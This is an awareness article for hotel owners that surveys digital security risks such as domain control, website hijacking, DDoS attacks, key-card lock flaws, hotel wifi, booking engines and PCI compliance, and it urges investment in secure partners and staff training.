Hotel Digital Alert: The Security Headaches of Hoteliers

A Survival Guide to the digital world of the contemporary hotel

HotelDigitalAlert

By John Giannatos

The concept of hotels and accommodation goes a long way back, way before the thermal baths of the ancient Greeks or the mansions that hosted travelers on government business in ancient Rome. In all those years, only minor changes have evolved. It is at the time when the internet appeared and changed the whole setting, as well as, it diversified the process of buying the “product”.
This change came as a shock to hoteliers who did not have sufficient knowledge and the appropriate background to manage such complex issues. The vocabulary of the modern hotelier has been enriched with over 500 new words of technical terminology.

Up until now, hoteliers were trying to grasp any given opportunity in order to increase their sales and gain all they could from this new medium. What they did not take into account, however, was the multiple risks and the infrastructure required in order to create an absolutely secure, digital commercial field.
Most frequently, investments concern the pursuit of profit, with neglecting a serious approach to security issues and digital infrastructures.
Things might have worked this way so far, but, soon this is about to change forever. The sum of money circulating within the accommodation industry tends to get larger and larger, thus, in the near future cybercrime will be knocking on the door of the hoteliers.
Let’s have a closer look at the Achilles heel of the hospitality industry. Might there be more than just one perils?

Domain Names

The domain names are the most important assets of your hotel, therefore, they should be owned by the hotel itself and not by some third party. There are cases where web design companies purchase the domain name on behalf of the hotels and they then maintain it on their name. Security issues may rise from even the staff of that company. Just imagine the credentials of the domain name registration of your hotel, sent via an anonymous e-mail to dozens of forums by a frustrated employee of the web design company that had purchased with a good intention -initially- your domain name for you.

Hosting & Security

In terms of safety, this constitutes a choice of crucial importance since the function of the website and the hotel’s e-mails, depend wholly on the reliability and quality of services of the hosting provider.

HotelDigitalAlert4

The soft version
Hackers obtain access to your website – the easiest hacking case in our days – and they change your keywords so that you lose your SEO positioning.
They create a hidden text which links you to bad websites so that the Google algorithm places you in the black list and, again, you lose your SEO positioning.
They mingle with the script which accompanies your Geo Location according to the location of the visitor. While you keep seeing your site as it is, users in the UK see: “Unfortunately, due to renovation our hotel is closed for the next two months”.
They change the robots.txt from “allow” to “disallow” and as a result you are not visible in search engines.
They alter the e-mail recipient of your contact form or they add a different one that you don’t have access to.

The hardcore version
Hackers can violate the Control Panel of your website and, thus, create forwarders to the official e-mails of your hotel subsequently monitoring all of your correspondence with your clients for years (reservation details, credit cards etc). They can then create an email account such as [email protected] and send newsletters on behalf of your hotel.
Imagine your hotel making the headlines with the title: “Thousands of personal details and credit card information lost due to Low Security practices by Hotel X”.
In the case of this worst scenario, a lawsuit by customers could be disastrous, both, for the hotel and your reputation.

Denial-of-service attack, DDoS attack

This is how the attacks on a network or a server are called which, basically, aim at making a computer or a service unable to accept other connections. This is the frontline tool of cyber war and it is attacking the server that hosts your hotel website.
In some cases, hackers activate multiple zombie compromised computers around the world which are usually infected with a Trojan, in order to target a single system causing a Denial of Service (DoS) attack. Victims of a DDoS attack consist of, both, the end targeted system and all systems maliciously used and controlled by the hacker in the distributed attack.
In a DDoS attack, the incoming traffic flooding the victim originates from many different sources – potentially thousands of zombie computers. This effectively makes it impossible to stop the attack simply by blocking a single IP address.
Your hotel website is an online shop which sells rooms. Nothing is more important than having a 24/7 operating web host. Be alert for signs of cyber war and never underestimate what loose ends can do to your enterprise.

The PMS

PMS software coordinates the operational functions of your front office and deals with a large number of critical information concerning your hotel. For its sound operation, it needs to provide a role-based security and easily manage all users, specifying clearly which machines are allowed to use the actual software tool. Not all employees of your hotel should have access to full customer information. Some PMS software give access to Accounting and Reporting data, something, which makes them sensitive upon security management.

The digital doors

The Card Version
At the Black Hat security conference, a hacker named Cody Brocious – a Mozilla software developer – demonstrated a very cheap device with which someone could gain instant access to millions of hotel rooms protected by key card locks. The whole process takes just 200 milliseconds from plugging the device to opening the door.

The Mobile Phone Version
A new service arising enables mobile phones to work as digital keys, thus, replacing the typical room key or card. Guests using their smart-phone would receive a secure key code which they would use to unlock the door wirelessly. According to a Wall Street Journal, it is as soon as the beginning of 2015 that some Hilton hotels will allow for door unlocking with a smart-phone and with the global roll-out expected to complete by the end of 2016…

HotelDigitalAlert3

These services are highly appreciated as long as they make the customer’s stay even more enjoyable, but nonetheless, they pose a number of safety risks. We are confident that Hilton’s security standards have foreseen such issues. Problems may multiply when this service become available in all hotels. A number of cheap services provided by companies which opened overnight will simply add another reason of worrying about room safety in hotels.

If those systems are not 100% safe, then we will start having reviews on the social networks along the lines of: “Lack of security, our room was burgled during our stay”. Things are bound to become even more complex in the extreme case when the life of the visitor is in peril’

The Wi-fi of your hotel

Providing free wifi is a good thing, but, providing a public wifi to which users can log-in anonymously is a different story altogether. State legislations are been changed so that the hotel can be aware of which customers are using the hotel’s wifi ‘ via login applications, facebook logins etc. No hotelier would want a terrorist attack initiated from the public network of their hotel without been able to identify the user. (The current EU legislation renders all responsibility to the hotel General Manager).

habitaciocc81n-hotel2

Yet another threat for your customers is the “man-in-the-middle’ application attacks. Within an unsecure wifi network anyone within the hotel’s wifi range can potentially acquire access to communications being sent on the network. During their stay at your hotel, the client has over 20% chance to buy online another service within the area. The hotel’s internet security remains of great significance. The same applies to the hotel’s intranet. An unsecured wireless network becomes the perfect gateway for hackers to the internal network of any business or organization. You definitely do not want everyone to have access to the critical data of your hotel.
Wifi security has significantly improved in recent years. The weakest link, however, remains the hoteliers who opt for cheaper services and equipment. It is in the hands of the hoteliers to establish strict standards on this.

The Booking Engine

This is the absolute peak to the pyramid of e-commerce in the contemporary hotel. It manages the largest and the most important and mostly sensitive part of the visitors and clients section. Nowadays, hackers have strong tools at their disposal, so think twice before investing on a “cheap” booking engine. It is always good to know in advance that if at some point things turn nasty, you will pay a lot more in the end.

The majority of Booking Engines now provide 256 bit ssl certificates, so that the user can feel safe when handing out their credit card details.
Nevertheless, according to latest developments “The Payment Card Industry Data Security Standard” (PCI DSS) is a proprietary security standard.

The (PCI) compliance is adherent to a set of security standards that were developed to protect card information during and after a financial transaction. This is an important feature that a booking engine should have but only a few do. It is one of the prerequisites set by Tripadvisor upon booking engines in order for them to be able to accept online bookings directly.

Distribution_PCI-Compliance
Making a hotel reservation via an absolutely secure booking engine is even more secure than making it over the telephone.

In order to still save money, some hotels still create custom-made booking engine. A bad and unsecured idea according to the perils we have described so far.
EU, USA and Australian legislations forbid the management of such data via custom-made solutions in a non-secure environment. It is illegal and dangerous.
Remember the examples with the newspaper or the social media we mentioned above. Pursue positive media coverage only.

HTTPS Everywhere @ Secure Sites by Default.

Make your hotel website secure.
Large worldwide organizations such as the Electronic Frontier Foundation have created HTTPS Everywhere. This is a global trend among large Internet organizations in collaboration with Web Browsers indicating the necessity for all websites to become Secure by default (https) within the next few years.
Google already places a great emphasis on HTTPS so that users of Search, Gmail and Drive for example have automatically a secure connection to Google.

At the annual event “Google IO 2014” it invited users to convert their websites into Secure ones and announced via its official blog that it intends to give an SEO Bonus to all sites that have https.

Both major browsers, Chrome and Mozilla Firefox, have declared their intention to set a date in the near future when browsing the internet will be in an https secure environment and the user will be alerted when the visited page is a non-secure one.

HotelDigitalAlert5f
The Human aspect

One of the biggest weaknesses in information security today is the human aspect.
We don’t only have to deal with cases of malicious actions but with cases of error too. It only takes a simple mistake from an untrained employee to leave an open door at your information security. Most information security controls can be bypassed by careless or unaware employees or partners.

Nowadays, hotels are required to have information security awareness and education. Most of the regulations, the industry requirements, and new technologies require some form of information security awareness training programs that address the hotel’s staff.

Even those who are trusted must sign an NDA so that if in the future they are employed by a competitive hotel to yours, you can make sure that your customer information or mailing lists will stay at your own disposal only. The same applies to all the various companies that handle the data of your hotel. NDAs should be signed between companies and their partners too. Any Non-disclosure agreement between you and the firm, has no power on employees that have left this company.

This article was not written only to protect you from your enemies, but, to equally alert you to watch over your shoulder when it comes to friends too. Most examples of bad practice I have gained from experiences of hotels in their collaboration with web design / development companies, which exploit the hotelier’s ignorance on certain matters and their weakness towards the “cheap” options. Before establishing a collaboration, we should take a closer look at the company’s reputation and history, its quality of provided services to other hotels, the retention rates of the agency’s employees etc.

The above does not constitute a sci-fi movie but it is the result of the digital daily routine. The more the money accumulated by the accommodation industry, the higher the perils will become.

This is a serious matter and one you should be investing money on. Only collaborate with professionals and do not leave anything to chance. Do not always choose the cheaper option. You will always get what you pay for. Cheap is cheap.

Opt for the partners that other hotel chains and big hotels choose. Research the market and ask for references on internet and technology issues, prior to hiring an individual or a firm. The hotel is now an online store and requires maximum expertise and safety on Online Transactions and Sales. The competition is constantly moving to the digital environment, therefore the digital know-how is what makes the difference.
Educate yourself as much as you can and always clarify the questions that may rise by asking for more details on security issues about each service and product.